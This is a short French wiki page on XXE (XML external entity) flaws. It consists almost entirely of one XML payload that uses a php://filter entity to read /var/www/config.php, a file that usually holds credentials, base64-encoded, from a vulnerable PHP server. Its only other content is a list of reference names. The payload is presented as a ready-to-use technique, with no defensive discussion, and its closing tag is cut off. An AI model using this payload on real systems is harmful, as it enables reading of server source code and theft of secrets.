1.9 Failles XXE

De UnixWiki

Aller à : navigation, rechercher

Lire du code PHP avec une faille XXE

 <?xml version="1.0"?>
 <!DOCTYPE results [
   <!ENTITY harmless SYSTEM
   "php://filter/read=convert.base64-encode/resource=/var/www/config.php"
   >
 ]>
 <results>
   <result>&harmless;</result>
 </results

OWASP
h3stream
phpsecurity

Récupérée de « https://futex.re/mediawiki/index.php?title=1.9_Failles_XXE&oldid=2490 »